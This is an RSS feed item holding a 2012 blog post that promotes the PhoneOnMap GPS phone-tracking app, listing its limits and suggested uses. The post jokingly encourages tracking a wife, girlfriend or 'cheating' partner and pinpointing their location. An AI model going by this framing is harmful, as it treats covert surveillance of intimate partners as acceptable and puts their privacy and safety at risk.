This application can be useful for office work as well as &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD11&quot;&gt;family members&lt;/span&gt;. You can track your child as well as your girlfrend/wife too&amp;nbsp;(:P) . This &lt;b&gt;&lt;a href=&quot;http://phoneonmap.com/&quot;&gt;PhoneOnMap&lt;/a&gt;&lt;/b&gt;   can be used worldwide and you can use it while travelling too. The  data  is stored on the company’s server for a period of one month.  This&amp;nbsp;can  be an invaluable&amp;nbsp;source for sales and marketting department of  an  organization to track the marketing agents.&lt;br /&gt;
&lt;br /&gt;
If you are&amp;nbsp;worried about&amp;nbsp;the &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD3&quot;&gt;security&lt;/span&gt; and privacy&amp;nbsp;of the service, let me tell that it is very &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD4&quot;&gt;secure&lt;/span&gt;   and your cell phone can not be monitored by any Unauthorized User as  in  order to access the tracking system, you have to authenticate  yourself  through a personal code which was used as identification while   installingapplication on cell phone. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2&gt;Features of&amp;nbsp; GPS cell phone tracking system :-&lt;/h2&gt;1. &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD6&quot;&gt;GPS cell phone tracker&lt;/span&gt; and locater will not work in the underground transportation . &lt;br /&gt;
2. The application does not work when the phone is turned off.&lt;br /&gt;
3. The data transmission outside provider’s coverage area will add roaming charges like any other phone service charge us .&lt;br /&gt;
4. Once application is uninstalled from cell phone than you can’t do anything .&lt;br /&gt;
5. On &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD7&quot;&gt;internet tracking&lt;/span&gt; system will show cell phone location between every 10 seconds to 10 minutes , which is depend on setting .&lt;br /&gt;
&lt;br /&gt;
Accordng to me this kind of service is very important for parents to   track their children and from a business usage point of view an   invaluable part of companies involved in supply and delvery system like   Courrier and Home delivery system. This will help them to get a  realtime  location of the object and provide an accurate timeframe for  the  delivery.&lt;br /&gt;
&lt;br /&gt;
As of now this service does not provide the exact pin point location but   the location determined s in the range of 10-20 meters. However with   little intelligence the exact location can be easily determined   especially when you wish to track your children or the cheating  boyfriend/girlfrend…(lol)&lt;/div&gt;</description><link>http://convex-coders.blogspot.com/2012/01/trace-anyones-mobile-with-gps-and.html</link><author>noreply@blogger.com (Convex Coders)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieuvPioojGqYDdYgrNXb3Xch8hRtHPmQgQTSPatzZXilkoxcsu4ab6oJ04SSfS66w6CZlC5o581dNRBRhWM8Yp9srhLk_TNFozhEjbc_0mCHyoV7iZN4JZMRiaNqtf1DCV4yRpVSBUzT4/s72-c/laptop8_gps_lr.jpg" height="72" width="72"/><thr:total>2</thr:total></item></channel></rss>